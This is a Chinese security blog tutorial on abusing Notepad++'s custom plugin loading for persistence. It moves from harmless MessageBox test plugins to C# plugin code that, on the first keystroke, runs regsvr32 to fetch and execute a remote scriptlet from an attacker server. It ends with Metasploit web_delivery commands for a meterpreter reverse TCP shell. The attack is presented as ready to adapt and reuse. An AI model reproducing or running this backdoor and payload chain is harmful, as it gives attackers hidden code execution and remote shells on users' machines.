狼目安全🕹️BOLG-网络安全博客

Notepade++：
图片-1690553328172
Notepade++是一款Windows中的免费文本编辑器，其功能非常强大，即可以编辑普通文本内容当作记事本，还可以编辑类似python，Html，C等等的代码所以是很多普通用户，开发者和安全爱好者电脑必不可少的一款工具也是花某平常使用最频繁的一款编辑器。

自定义插件：

最喜欢的就是它的自定义插件功能，可以自己添加非常多的插件用于扩展功能，最重要的是可以不用去官方商城下载官方插件可以使用自己开发的插件，所以就可以利用它实现命令执行和运行脚本等目的。

实操：
项目1：

https://github.com/npp-plugins/plugintemplate

此项目为不会插件开发的准备了一个模板只需要修改些许代码即可实现自己的测试功能。

图片-1690553603244
图片-1690553637333

https://github.com/npp-plugins/plugintemplate/releases/download/v4.3/pluginTemplate.v4.3.bin.arm64.zip

也可直接下载这个，下载完成后先用VS studio打开"\plugintemplate-master\src\PluginDefinition.h"文件
图片-1690553697955
31行位置const TCHAR NPP_PLUGIN_NAME的TEXT可以随意起个名字
图片-1690553731986
图片-1690553748835
这里的值不能为0，项目存在两个测试内容，改完配置内容再打开"plugintemplate-master\src\PluginDefinition.cpp"文件
图片-1690553798012

添加弹窗测试代码：

void pluginInit(HANDLE /*hModule*/)
{
	  MessageBox(NULL, TEXT(""), TEXT("test"), NULL);
}

然后生成Dll
图片-1690553883091
图片-1690553905733
图片-1690553928873
随后创建文件夹叫：“rt test”
图片-1690553962343
把生成的dll拖进去
图片-1690554001773
然后找到notepade的plugins文件夹路径是C:\Notepad\plugins注：notepade++插件的文件名夹名和dll文件名得是同一个。
做完这些后我们可以新建一个文本文档去查看效果。
图片-1690554044535
输入字符成功弹窗。

项目2：

https://github.com/kbilste/NotepadPlusPlusPluginPack.Net

此开发项目对于前面的项目来说开放性更大，对于前者来说它提供的只有2种测试方案，而此开发项目给出开发模板的同时可以在模板内开发出更多的测试代码从而去实现权限维持目的。
图片-1690554119079
图片-1690554137498
项目底部也有说明
首先下载项目源码：
图片-1690554174871
在VS studio选择新建项目：
图片-1690554315659
选择类库
图片-1690554342217
因为项目是C#的所以选择创建C#类库项目
图片-1690554361835
项目名称输入“rt rest2”
图片-1690554383372
框架选择要4.5往上要不然错误一堆，创建完毕后点击打开文件
图片-1690554470562
打开Visual Studio Project Template C#文件下的Main.cs文件
图片-1690554500006
图片-1690554513595
这里的OnNotification部分是供大家自定义的
图片-1690554535554
测试代码：

class Main
{
static bool ExecuteOnce = true;
public static void OnNotification(ScNotification notification)
{
    if (notification.Header.Code == (uint)SciMsg.SCI_ADDTEXT && ExecuteOnce)
    {
        MessageBox.Show("rt test2");
        ExecuteOnce = !ExecuteOnce;
    }
}

首先在 class Malin下添加上面的static bool ExecuteOnce = true；代码
图片-1690554596171
然后在自定义部分粘贴其余代码：
图片-1690554652361
编译生成Dll文件
图片-1690554671773
和上步同样创建rt test2文件夹拖入生成的dll
图片-1690554690105
再放到Notepade++的plugins文件夹下创建rt test2.txt文本进行测试
图片-1690554722377
图片-1690554745239
成功弹窗。

反弹shell：
pentestlab.blog公开的测试代码：

class   Main
 {
static   bool   firstRun =  true ;
     public   static   void   OnNotification(ScNotification notification)
     {
         if   (notification.Header.Code == ( uint )SciMsg.SCI_ADDTEXT && firstRun)
         {
             string   strCmdText;
             strCmdText =  "/s /n /u /i: http://10.0.0.3:8080/nHIcvfz6N.sct  scrobj.dll" ;
             Process.Start( "regsvr32" , strCmdText);
             firstRun = !firstRun;
             }
         }

使用regsvr32命令来注册一个DLL文件，大家可以根据自己的情况去更改

图片-1690554831800
MSF：

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set LHOST xxx
set LPORT xxx
run

图片-1690554875438
图片-1690554896331
然后直接用sessions管理连接进行操作即可。